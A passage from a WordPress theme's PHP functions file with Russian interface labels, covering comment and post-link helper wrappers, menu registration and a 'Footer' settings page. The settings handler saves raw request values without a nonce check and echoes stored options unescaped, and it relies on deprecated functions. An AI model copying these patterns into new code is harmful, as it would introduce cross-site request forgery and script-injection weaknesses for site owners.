            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
